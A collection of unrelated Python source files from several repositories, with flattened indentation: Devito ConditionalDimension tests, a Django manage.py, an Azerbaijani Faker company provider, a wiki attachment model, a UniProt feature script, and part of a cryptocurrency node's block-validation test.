sf = SparseFunction(name='sf', grid=grid, npoint=4, coordinates=coordinates)
sf.data[:] = 1.
sd = sf.dimensions[sf._sparse_position]
# We want to write to `f` through `sf` so that we obtain the
# following 4x4 grid (the '*' show the position of the sparse points)
# We do that by emulating an injection
#
# 0 --- 0 --- 0 --- 0
# | * | | * |
# 0 --- 1 --- 1 --- 0
# | | | |
# 0 --- 1 --- 1 --- 0
# | * | | * |
# 0 --- 0 --- 0 --- 0
radius = 1
indices = [(i, i+radius) for i in sf._coordinate_indices]
bounds = [i.symbolic_size - radius for i in grid.dimensions]
eqs = []
for e, i in enumerate(product(*indices)):
args = [j > 0 for j in i]
args.extend([j < k for j, k in zip(i, bounds)])
condition = And(*args, evaluate=False)
cd = ConditionalDimension('sfc%d' % e, parent=sd, condition=condition)
index = [time] + list(i)
eqs.append(Eq(f[index], f[index] + sf[cd]))
op = Operator(eqs)
op.apply(time=0)
assert np.all(f.data[0, 1:-1, 1:-1] == 1.)
assert np.all(f.data[0, 0] == 0.)
assert np.all(f.data[0, -1] == 0.)
assert np.all(f.data[0, :, 0] == 0.)
assert np.all(f.data[0, :, -1] == 0.)
def test_symbolic_factor(self):
"""
Test ConditionalDimension with symbolic factor (provided as a Constant).
"""
g = Grid(shape=(4, 4, 4))
u = TimeFunction(name='u', grid=g, time_order=0)
fact = Constant(name='fact', dtype=np.int32, value=4)
tsub = ConditionalDimension(name='tsub', parent=g.time_dim, factor=fact)
usave = TimeFunction(name='usave', grid=g, time_dim=tsub, save=4)
op = Operator([Eq(u, u + 1), Eq(usave, u)])
op.apply(time=7) # Use `fact`'s default value, 4
assert np.all(usave.data[0] == 1)
assert np.all(usave.data[1] == 5)
u.data[:] = 0.
op.apply(time=7, fact=2)
assert np.all(usave.data[0] == 1)
assert np.all(usave.data[1] == 3)
assert np.all(usave.data[2] == 5)
assert np.all(usave.data[3] == 7)
def test_implicit_dims(self):
"""
Test ConditionalDimension as an implicit dimension for an equation.
"""
# This test makes an Operator that should create a vector of increasing
# integers, but stop incrementing when a certain stop value is reached
shape = (50,)
stop_value = 20
time = Dimension(name='time')
f = TimeFunction(name='f', shape=shape, dimensions=[time])
# The condition to stop incrementing
cond = ConditionalDimension(name='cond',
parent=time, condition=f[time] < stop_value)
eqs = [Eq(f.forward, f), Eq(f.forward, f.forward + 1, implicit_dims=[cond])]
op = Operator(eqs)
op.apply(time_M=shape[0] - 2)
# Make the same calculation in python to assert the result
F = np.zeros(shape[0])
for i in range(shape[0]):
F[i] = i if i < stop_value else stop_value
assert np.all(f.data == F)
def test_grouping(self):
"""
Test that Clusters over the same set of ConditionalDimensions fall within
the same Conditional. This is a follow up to issue #1610.
"""
grid = Grid(shape=(10, 10))
time = grid.time_dim
cond = ConditionalDimension(name='cond', parent=time, condition=time < 5)
u = TimeFunction(name='u', grid=grid, space_order=4)
# We use a SubDomain only to keep the two Eqs separated
eqns = [Eq(u.forward, u + 1, subdomain=grid.interior),
Eq(u.forward, u.dx.dx + 1., implicit_dims=[cond])]
op = Operator(eqns, opt=('advanced-fsg', {'cire-mincost-sops': 1}))
conds = FindNodes(Conditional).visit(op)
assert len(conds) == 1
assert len(retrieve_iteration_tree(conds[0].then_body)) == 2
def test_stepping_dim_in_condition_lowering(self):
"""
Check that the compiler performs lowering on conditions
with TimeDimensions and generates the expected code::
if (g[t][x + 1][y + 1] <= 10){ if (g[t0][x + 1][y + 1] <= 10){
... --> ...
} }
This test increments a function by one at every timestep while it is
less than or equal to 10 (g <= 10), although the operator runs for 13 timesteps.
"""
grid = Grid(shape=(4, 4))
_, y = grid.dimensions
ths = 10
g = TimeFunction(name='g', grid=grid)
ci = ConditionalDimension(name='ci', parent=y, condition=Le(g, ths))
op = Operator(Eq(g.forward, g + 1, implicit_dims=ci))
op.apply(time_M=ths+3)
assert np.all(g.data[0, :, :] == ths)
assert np.all(g.data[1, :, :] == ths + 1)
assert ('if (g[t0][x + 1][y + 1] <= 10)\n'
'{\n g[t1][x + 1][y + 1] = g[t0][x + 1][y + 1] + 1') in str(op.ccode)
def test_expr_like_lowering(self):
"""
Test the lowering of an expr-like ConditionalDimension's condition.
This test makes an Operator that should indexify and lower the condition
passed to the ConditionalDimension.
"""
grid = Grid(shape=(3, 3))
g1 = Function(name='g1', grid=grid)
g2 = Function(name='g2', grid=grid)
g1.data[:] = 0.49
g2.data[:] = 0.49
x, y = grid.dimensions
ci = ConditionalDimension(name='ci', parent=y, condition=Le((g1 + g2),
1.01*(g1 + g2)))
f = Function(name='f', shape=grid.shape, dimensions=(x, ci))
Operator(Eq(f, g1+g2)).apply()
assert np.all(f.data[:] == g1.data[:] + g2.data[:])
@pytest.mark.parametrize('setup_rel, rhs, c1, c2, c3, c4', [
# Relation, RHS, c1 to c4 used as indexes in assert
(Lt, 3, 2, 4, 4, -1), (Le, 2, 2, 4, 4, -1), (Ge, 3, 4, 6, 1, 4),
(Gt, 2, 4, 6, 1, 4), (Ne, 5, 2, 6, 1, 2)
])
def test_relational_classes(self, setup_rel, rhs, c1, c2, c3, c4):
"""
Test ConditionalDimension using conditions based on Relations over SubDomains.
"""
class InnerDomain(SubDomain):
name = 'inner'
def define(self, dimensions):
return {d: ('middle', 2, 2) for d in dimensions}
inner_domain = InnerDomain()
grid = Grid(shape=(8, 8), subdomains=(inner_domain,))
g = Function(name='g', grid=grid)
g2 = Function(name='g2', grid=grid)
for i in [g, g2]:
i.data[:4, :4] = 1
i.data[4:, :4] = 2
i.data[4:, 4:] = 3
i.data[:4, 4:] = 4
xi, yi = grid.subdomains['inner'].dimensions
cond = setup_rel(0.25*g + 0.75*g2, rhs, subdomain=grid.subdomains['inner'])
ci = ConditionalDimension(name='ci', parent=yi, condition=cond)
f = Function(name='f', shape=grid.shape, dimensions=(xi, ci))
eq1 = Eq(f, 0.4*g + 0.6*g2)
eq2 = Eq(f, 5)
Operator([eq1, eq2]).apply()
assert np.all(f.data[2:6, c1:c2] == 5.)
assert np.all(f.data[:, c3:c4] < 5.)
def test_from_cond_to_param(self):
"""
Test that Functions appearing in the condition of a ConditionalDimension
but not explicitly in an Eq are actually part of the Operator input
(stems from issue #1298).
"""
grid = Grid(shape=(8, 8))
x, y = grid.dimensions
g = Function(name='g', grid=grid)
h = Function(name='h', grid=grid)
ci = ConditionalDimension(name='ci', parent=y, condition=Lt(g, 2 + h))
f = Function(name='f', shape=grid.shape, dimensions=(x, ci))
for _ in range(5):
# issue #1298 was non-deterministic
Operator(Eq(f, 5)).apply()
@skipif('device')
def test_no_fusion_simple(self):
"""
If ConditionalDimensions are present, then Clusters must not be fused so
that ultimately Eqs get scheduled to different loop nests.
"""
grid = Grid(shape=(4, 4, 4))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid)
g = Function(name='g', grid=grid)
h = Function(name='h', grid=grid)
# No ConditionalDimensions yet. Will be fused and optimized
eqns = [Eq(f.forward, f + 1),
Eq(h, f + 1),
Eq(g, f + 1)]
op = Operator(eqns)
exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
assert len(exprs) == 4
assert exprs[1].expr.rhs is exprs[0].output
assert exprs[2].expr.rhs is exprs[0].output
assert exprs[3].expr.rhs is exprs[0].output
# Now with a ConditionalDimension. No fusion, no optimization
ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)
eqns = [Eq(f.forward, f + 1),
Eq(h, f + 1),
Eq(g, f + 1, implicit_dims=[ctime])]
op = Operator(eqns)
exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
assert len(exprs) == 3
assert exprs[1].expr.rhs is exprs[0].output
assert exprs[2].expr.rhs is exprs[0].output
exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
assert len(exprs) == 1
@skipif('device')
def test_no_fusion_convoluted(self):
"""
Conceptually like `test_no_fusion_simple`, but with more expressions
and non-trivial data flow.
"""
grid = Grid(shape=(4, 4, 4))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid)
g = Function(name='g', grid=grid)
h = Function(name='h', grid=grid)
ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)
eqns = [Eq(f.forward, f + 1),
Eq(h, f + 1),
Eq(g, f + 1, implicit_dims=[ctime]),
Eq(f.forward, f + 1, implicit_dims=[ctime]),
Eq(f.forward, f + 1),
Eq(g, f + 1)]
op = Operator(eqns)
exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
assert len(exprs) == 3
assert exprs[1].expr.rhs is exprs[0].output
assert exprs[2].expr.rhs is exprs[0].output
exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
assert len(exprs) == 3
exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
assert len(exprs) == 3
assert exprs[1].expr.rhs is exprs[0].output
assert exprs[2].expr.rhs is exprs[0].output
def test_affiness(self):
"""
Test for issue #1616.
"""
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
u = TimeFunction(name='u', grid=grid)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled)
eqns = [Eq(u.forward, u + 1.), Eq(usave, u)]
op = Operator(eqns)
iterations = [i for i in FindNodes(Iteration).visit(op) if i.dim is not time]
assert all(i.is_Affine for i in iterations)
class TestMashup(object):
"""
Check the correct functioning of the compiler in presence of many Dimension types.
"""
def test_topofusion_w_subdims_conddims(self):
"""
Check that topological fusion works across guarded Clusters over different
iteration spaces and in the presence of anti-dependences.
This test uses both SubDimensions (via SubDomains) and ConditionalDimensions.
"""
grid = Grid(shape=(4, 4, 4))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid, time_order=2)
g = TimeFunction(name='g', grid=grid, time_order=2)
h = TimeFunction(name='h', grid=grid, time_order=2)
fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)
ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)
eqns = [Eq(f.forward, f + 1),
Eq(g.forward, g + 1),
Eq(fsave, f.dt2, implicit_dims=[ctime]),
Eq(h, f + g, subdomain=grid.interior),
Eq(gsave, g.dt2, implicit_dims=[ctime])]
op = Operator(eqns)
# Check generated code -- expect the gsave equation to be scheduled together
# in the same loop nest with the fsave equation
assert len(op._func_table) == 3
exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
assert len(exprs) == 2
assert exprs[0].write is f
assert exprs[1].write is g
exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
assert len(exprs) == 3
assert exprs[1].write is fsave
assert exprs[2].write is gsave
exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
assert len(exprs) == 1
assert exprs[0].write is h
def test_topofusion_w_subdims_conddims_v2(self):
"""
Like `test_topofusion_w_subdims_conddims` but with more SubDomains,
so we expect fewer loop nests.
"""
grid = Grid(shape=(4, 4, 4))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid, time_order=2)
g = TimeFunction(name='g', grid=grid, time_order=2)
h = TimeFunction(name='h', grid=grid, time_order=2)
fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)
ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)
eqns = [Eq(f.forward, f + 1, subdomain=grid.interior),
Eq(g.forward, g + 1, subdomain=grid.interior),
Eq(fsave, f.dt2, implicit_dims=[ctime]),
Eq(h, f + g, subdomain=grid.interior),
Eq(gsave, g.dt2, implicit_dims=[ctime])]
op = Operator(eqns)
# Check generated code -- expect the gsave equation to be scheduled together
# in the same loop nest with the fsave equation
assert len(op._func_table) == 2
assert len(FindNodes(Expression).visit(op._func_table['bf0'].root)) == 3
assert len(FindNodes(Expression).visit(op._func_table['bf1'].root)) == 2 + 1 # r0
def test_topofusion_w_subdims_conddims_v3(self):
"""
Like `test_topofusion_w_subdims_conddims_v2` but with an extra anti-dependence,
which causes scheduling over more loop nests.
"""
grid = Grid(shape=(4, 4, 4))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid, time_order=2)
g = TimeFunction(name='g', grid=grid, time_order=2)
h = TimeFunction(name='h', grid=grid, time_order=2)
fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)
ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)
eqns = [Eq(f.forward, f + 1, subdomain=grid.interior),
Eq(g.forward, g + 1, subdomain=grid.interior),
Eq(fsave, f.dt2, implicit_dims=[ctime]),
Eq(h, f.dt2.dx + g, subdomain=grid.interior),
Eq(gsave, g.dt2, implicit_dims=[ctime])]
op = Operator(eqns)
# Check generated code -- expect the gsave equation to be scheduled together
# in the same loop nest with the fsave equation
assert len(op._func_table) == 3
exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
assert len(exprs) == 2
assert exprs[0].write is f
assert exprs[1].write is g
exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
assert len(exprs) == 3
assert exprs[1].write is fsave
assert exprs[2].write is gsave
exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
assert len(exprs) == 2
assert exprs[1].write is h
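# A minimal, self-contained sketch of the time-subsampling pattern exercised
# throughout TestConditionalDimension, assuming only the public devito API
# already used above (Grid, TimeFunction, ConditionalDimension, Eq, Operator):
if __name__ == "__main__":
    from devito import Grid, TimeFunction, ConditionalDimension, Eq, Operator
    demo_grid = Grid(shape=(4, 4))
    tsub = ConditionalDimension('tsub', parent=demo_grid.time_dim, factor=2)
    u_demo = TimeFunction(name='u_demo', grid=demo_grid)
    usave_demo = TimeFunction(name='usave_demo', grid=demo_grid, save=3,
                              time_dim=tsub)
    # u_demo counts timesteps; usave_demo records it every `factor` steps
    Operator([Eq(u_demo.forward, u_demo + 1),
              Eq(usave_demo, u_demo)]).apply(time_M=4)
    # usave_demo now holds u_demo at timesteps 0, 2 and 4 (values 0, 2, 4)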
|
MoonCheesez/stack
|
PiGame/pigame/manage.py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pigame.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
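# Typical invocations, assuming the `pigame` package is on PYTHONPATH and a
# database is configured in pigame.settings:
#   python manage.py migrate
#   python manage.py runserver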
|
joke2k/faker
|
faker/providers/company/az_AZ/__init__.py
|
from .. import Provider as CompanyProvider
class Provider(CompanyProvider):
formats = (
"{{last_name}} {{company_suffix}}",
"{{last_name}} {{last_name}} {{company_suffix}}",
"{{large_company}}",
)
large_companies = (
"AZAL",
"Azergold",
"SOCAR",
"Socar Polymer",
"Global Export Fruits",
"Baku Steel Company",
"Azersun",
"Sun Food",
"Azərbaycan Şəkər İstehsalat Birliyi",
"Azərsu",
"Xəzər Dəniz Gəmiçiliyi",
"Azərenerji",
"Bakıelektrikşəbəkə",
"Azəralüminium",
"Bravo",
"Azərpambıq Aqrar Sənaye Kompleksi",
"CTS-Agro",
"Azərtütün Aqrar Sənaye Kompleksi",
"Azəripək",
"Azfruittrade",
"AF Holding",
"Azinko Holding",
"Gilan Holding",
"Azpetrol",
"Azərtexnolayn",
"Bakı Gəmiqayırma Zavodu",
"Gəncə Tekstil Fabriki",
"Mətanət A",
"İrşad Electronics",
)
company_suffixes = (
"ASC",
"QSC",
"MMC",
)
def large_company(self):
"""
:example: 'SOCAR'
"""
return self.random_element(self.large_companies)
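# A minimal usage sketch, assuming the faker package is installed. With the
# az_AZ locale, company() fills one of the formats above, so it yields either
# a "<last_name> ... <company_suffix>" string or one of the large_companies.
if __name__ == "__main__":
    from faker import Faker
    fake = Faker("az_AZ")
    print(fake.company())        # e.g. "Gilan Holding" (output is random)
    print(fake.large_company())  # always drawn from large_companies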
|
indexofire/gork
|
src/gork/application/know/plugins/attachments/models.py
|
# -*- coding: utf-8 -*-
import os.path
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.conf import settings as django_settings
from django.db.models import signals
from know.plugins.attachments import settings
from know import managers
from know.models.pluginbase import ReusablePlugin
from know.models.article import BaseRevisionMixin
class IllegalFileExtension(Exception):
"""File extension on upload is not allowed"""
pass
class Attachment(ReusablePlugin):
objects = managers.ArticleFkManager()
current_revision = models.OneToOneField(
'AttachmentRevision',
verbose_name=_(u'current revision'),
blank=True,
null=True,
related_name='current_set',
help_text=_(u'The revision of this attachment currently in use (on all articles using the attachment)'),
)
original_filename = models.CharField(
max_length=256,
verbose_name=_(u'original filename'),
blank=True,
null=True,
)
def can_write(self, **kwargs):
user = kwargs.get('user', None)
if not settings.ANONYMOUS and (not user or user.is_anonymous()):
return False
return ReusablePlugin.can_write(self, **kwargs)
def can_delete(self, user):
return self.can_write(user=user)
class Meta:
verbose_name = _(u'attachment')
verbose_name_plural = _(u'attachments')
app_label = settings.APP_LABEL
def __unicode__(self):
return "%s: %s" % (self.article.current_revision.title, self.original_filename)
def extension_allowed(filename):
try:
extension = filename.split(".")[-1]
except IndexError:
# No extension
raise IllegalFileExtension("No file extension found in filename. That's not okay!")
if not extension.lower() in map(lambda x: x.lower(), settings.FILE_EXTENSIONS):
raise IllegalFileExtension("The following filename is illegal: %s. Extension has to be one of %s" %
(filename, ", ".join(settings.FILE_EXTENSIONS)))
return extension
def upload_path(instance, filename):
from os import path
extension = extension_allowed(filename)
# Has to match original extension filename
if instance.id and instance.attachment and instance.attachment.original_filename:
original_extension = instance.attachment.original_filename.split(".")[-1].lower()
if extension.lower() != original_extension:
raise IllegalFileExtension("File extension has to be '%s', not '%s'." %
(original_extension, extension.lower()))
elif instance.attachment:
instance.attachment.original_filename = filename
upload_path = settings.UPLOAD_PATH
upload_path = upload_path.replace('%aid', str(instance.attachment.article.id))
if settings.UPLOAD_PATH_OBSCURIFY:
import random
import hashlib
m = hashlib.md5(str(random.randint(0, 100000000000000)))
upload_path = path.join(upload_path, m.hexdigest())
if settings.APPEND_EXTENSION:
filename += '.upload'
return path.join(upload_path, filename)
class AttachmentRevision(BaseRevisionMixin, models.Model):
attachment = models.ForeignKey('Attachment')
file = models.FileField(
upload_to=upload_path,
max_length=255,
verbose_name=_(u'file'),
storage=settings.STORAGE_BACKEND,
)
description = models.TextField(
blank=True,
)
class Meta:
verbose_name = _(u'attachment revision')
verbose_name_plural = _(u'attachment revisions')
ordering = ('created',)
get_latest_by = ('revision_number',)
app_label = settings.APP_LABEL
def get_filename(self):
"""Used to retrieve the filename of a revision.
But attachment.original_filename should always be used in the frontend
such that filenames stay consistent."""
# TODO: Perhaps we can let file names change when files are replaced?
if not self.file:
return None
filename = self.file.name.split("/")[-1]
return ".".join(filename.split(".")[:-1])
def get_size(self):
"""Used to retrieve the file size and not cause exceptions."""
try:
return self.file.size
except OSError:
return None
except ValueError:
return None
def save(self, *args, **kwargs):
if (not self.id and
not self.previous_revision and
self.attachment and
self.attachment.current_revision and
self.attachment.current_revision != self):
self.previous_revision = self.attachment.current_revision
if not self.revision_number:
try:
previous_revision = self.attachment.attachmentrevision_set.latest()
self.revision_number = previous_revision.revision_number + 1
# NB! The above should not raise the below exception, but somehow it does.
except (AttachmentRevision.DoesNotExist, Attachment.DoesNotExist):
self.revision_number = 1
super(AttachmentRevision, self).save(*args, **kwargs)
if not self.attachment.current_revision:
# If I'm saved from Django admin, then article.current_revision is me!
self.attachment.current_revision = self
self.attachment.save()
def __unicode__(self):
return "%s: %s (r%d)" % (self.attachment.article.current_revision.title,
self.attachment.original_filename,
self.revision_number)
def on_revision_delete(instance, *args, **kwargs):
if not instance.file:
return
# Remove file
path = instance.file.path.split("/")[:-1]
instance.file.delete(save=False)
# Clean up empty directories
# Check for empty folders in the path and remove them, up to `max_depth` levels.
if len(path[-1]) == 32:
# Path was (most likely) obscurified so we should look 2 levels down
max_depth = 2
else:
max_depth = 1
for depth in range(0, max_depth):
delete_path = "/".join(path[:-depth] if depth > 0 else path)
try:
if len(os.listdir(os.path.join(django_settings.MEDIA_ROOT, delete_path))) == 0:
os.rmdir(delete_path)
except OSError:
# Raised by os.listdir if directory is missing
pass
signals.pre_delete.connect(on_revision_delete, AttachmentRevision)
|
wonjunetai/pulse
|
features/uniprot_core.py
|
# reads uniprot core file and generates core features
from features_helpers import score_differences
def build_uniprot_to_index_to_core(sable_db_obj):
uniprot_to_index_to_core = {}
for line in sable_db_obj:
tokens = line.split()
try:
# PARSING ID
prot = tokens[0]
index = int(tokens[1])
core = tokens[2]
# PARSING ID
if prot in uniprot_to_index_to_core:
uniprot_to_index_to_core[prot][index] = core
else:
uniprot_to_index_to_core[prot] = {index: core}
except ValueError:
print "Cannot parse: " + line[0:len(line) - 1]
return uniprot_to_index_to_core
def get_sable_scores(map_file, f_sable_db_location, uniprot_core_output_location):
map_file_obj = open(map_file, 'r')
sable_db_obj = open(f_sable_db_location, 'r')
write_to = open(uniprot_core_output_location, 'w')
uniprot_to_index_to_core = build_uniprot_to_index_to_core(sable_db_obj)
for line in map_file_obj:
tokens = line.split()
asid = tokens[0].split("_")[0]
prot = tokens[1]
sstart = int(tokens[2])
start = int(tokens[3])
end = int(tokens[4])
eend = int(tokens[5])
rough_a_length = int(int(tokens[0].split("_")[-1].split("=")[1]) / 3)
if asid[0] == "I":
rough_a_length = 0
c1_count = 0
a_count = 0
c2_count = 0
canonical_absolute = 0
if prot in uniprot_to_index_to_core:
c1_count = score_differences(uniprot_to_index_to_core, prot, sstart, start)
a_count = score_differences(uniprot_to_index_to_core, prot, start, end)
c2_count = score_differences(uniprot_to_index_to_core, prot, end, eend)
prot_len = int(line.split("\t")[7].strip())
canonical_absolute = score_differences(uniprot_to_index_to_core, prot, 1, prot_len)
print >> write_to, tokens[0] + "\t" + prot + "\t" + repr(c1_count) + "\t" + repr(a_count) + "\t" + repr(
c2_count) + "\t" + repr(canonical_absolute)
write_to.close()
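# A minimal invocation sketch (Python 2, like the rest of this module); the
# three paths are hypothetical placeholders for the exon map file, the SABLE
# database dump and the desired output location.
if __name__ == "__main__":
    get_sable_scores("exon_map.txt", "sable_db.txt", "uniprot_core_features.txt")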
|
Bushstar/UFO-Project
|
test/functional/feature_block.py
|
#!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test block processing."""
import copy
import struct
import time
from test_framework.blocktools import create_block, create_coinbase, create_tx_with_script, get_legacy_sigopcount_block
from test_framework.key import CECKey
from test_framework.messages import (
CBlock,
COIN,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
MAX_BLOCK_BASE_SIZE,
uint256_from_compact,
uint256_from_str,
)
from test_framework.mininode import P2PDataStore
from test_framework.script import (
CScript,
MAX_SCRIPT_ELEMENT_SIZE,
OP_2DUP,
OP_CHECKMULTISIG,
OP_CHECKMULTISIGVERIFY,
OP_CHECKSIG,
OP_CHECKSIGVERIFY,
OP_ELSE,
OP_ENDIF,
OP_EQUAL,
OP_DROP,
OP_FALSE,
OP_HASH160,
OP_IF,
OP_INVALIDOPCODE,
OP_RETURN,
OP_TRUE,
SIGHASH_ALL,
SignatureHash,
hash160,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
MAX_BLOCK_SIGOPS = 20000
# Use this class for tests that require behavior other than normal "mininode" behavior.
# For now, it is used to serialize a bloated varint (b64).
class CBrokenBlock(CBlock):
def initialize(self, base_block):
self.vtx = copy.deepcopy(base_block.vtx)
self.hashMerkleRoot = self.calc_merkle_root()
def serialize(self, with_witness=False):
r = b""
r += super(CBlock, self).serialize()
r += struct.pack("<BQ", 255, len(self.vtx))
for tx in self.vtx:
if with_witness:
r += tx.serialize_with_witness()
else:
r += tx.serialize_without_witness()
return r
def normal_serialize(self):
return super().serialize()
class FullBlockTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [[]]
def run_test(self):
node = self.nodes[0] # convenience reference to the node
self.bootstrap_p2p() # Add one p2p connection to the node
self.block_heights = {}
self.coinbase_key = CECKey()
self.coinbase_key.set_secretbytes(b"horsebattery")
self.coinbase_pubkey = self.coinbase_key.get_pubkey()
self.tip = None
self.blocks = {}
self.genesis_hash = int(self.nodes[0].getbestblockhash(), 16)
self.block_heights[self.genesis_hash] = 0
self.spendable_outputs = []
# Create a new block
b0 = self.next_block(0)
self.save_spendable_output()
self.sync_blocks([b0])
# Allow the block to mature
blocks = []
for i in range(99):
blocks.append(self.next_block(5000 + i))
self.save_spendable_output()
self.sync_blocks(blocks)
# collect spendable outputs now to avoid cluttering the code later on
out = []
for i in range(33):
out.append(self.get_spendable_output())
# Start by building a couple of blocks on top (which output is spent is
# in parentheses):
# genesis -> b1 (0) -> b2 (1)
b1 = self.next_block(1, spend=out[0])
self.save_spendable_output()
b2 = self.next_block(2, spend=out[1])
self.save_spendable_output()
self.sync_blocks([b1, b2])
# Fork like this:
#
# genesis -> b1 (0) -> b2 (1)
# \-> b3 (1)
#
# Nothing should happen at this point. We saw b2 first so it takes priority.
self.log.info("Don't reorg to a chain of the same length")
self.move_tip(1)
b3 = self.next_block(3, spend=out[1])
txout_b3 = b3.vtx[1]
self.sync_blocks([b3], False)
# Now we add another block to make the alternative chain longer.
#
# genesis -> b1 (0) -> b2 (1)
# \-> b3 (1) -> b4 (2)
self.log.info("Reorg to a longer chain")
b4 = self.next_block(4, spend=out[2])
self.sync_blocks([b4])
# ... and back to the first chain.
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b3 (1) -> b4 (2)
self.move_tip(2)
b5 = self.next_block(5, spend=out[2])
self.save_spendable_output()
self.sync_blocks([b5], False)
self.log.info("Reorg back to the original chain")
b6 = self.next_block(6, spend=out[3])
self.sync_blocks([b6], True)
# Try to create a fork that double-spends
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b7 (2) -> b8 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain with a double spend, even if it is longer")
self.move_tip(5)
b7 = self.next_block(7, spend=out[2])
self.sync_blocks([b7], False)
b8 = self.next_block(8, spend=out[4])
self.sync_blocks([b8], False, reconnect=True)
# Try to create a block that has too much fee
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b9 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block where the miner creates too much coinbase reward")
self.move_tip(6)
b9 = self.next_block(9, spend=out[4], additional_coinbase_value=1)
self.sync_blocks([b9], False, 16, b'bad-cb-amount', reconnect=True)
# Create a fork that ends in a block with too much fee (the one that causes the reorg)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b10 (3) -> b11 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer")
self.move_tip(5)
b10 = self.next_block(10, spend=out[3])
self.sync_blocks([b10], False)
b11 = self.next_block(11, spend=out[4], additional_coinbase_value=1)
self.sync_blocks([b11], False, 16, b'bad-cb-amount', reconnect=True)
# Try again, but with a valid fork first
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b14 (5)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer (on a forked chain)")
self.move_tip(5)
b12 = self.next_block(12, spend=out[3])
self.save_spendable_output()
b13 = self.next_block(13, spend=out[4])
self.save_spendable_output()
b14 = self.next_block(14, spend=out[5], additional_coinbase_value=1)
self.sync_blocks([b12, b13, b14], False, 16, b'bad-cb-amount', reconnect=True)
# New tip should be b13.
assert_equal(node.getbestblockhash(), b13.hash)
# Add a block with MAX_BLOCK_SIGOPS and one with one more sigop
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b16 (6)
# \-> b3 (1) -> b4 (2)
self.log.info("Accept a block with lots of checksigs")
lots_of_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS - 1))
self.move_tip(13)
b15 = self.next_block(15, spend=out[5], script=lots_of_checksigs)
self.save_spendable_output()
self.sync_blocks([b15], True)
self.log.info("Reject a block with too many checksigs")
too_many_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS))
b16 = self.next_block(16, spend=out[6], script=too_many_checksigs)
self.sync_blocks([b16], False, 16, b'bad-blk-sigops', reconnect=True)
# Attempt to spend a transaction created on a different fork
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b17 (b3.vtx[1])
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with a spend from a re-org'ed out tx")
self.move_tip(15)
b17 = self.next_block(17, spend=txout_b3)
self.sync_blocks([b17], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to spend a transaction created on a different fork (on a fork this time)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5)
# \-> b18 (b3.vtx[1]) -> b19 (6)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with a spend from a re-org'ed out tx (on a forked chain)")
self.move_tip(13)
b18 = self.next_block(18, spend=txout_b3)
self.sync_blocks([b18], False)
b19 = self.next_block(19, spend=out[6])
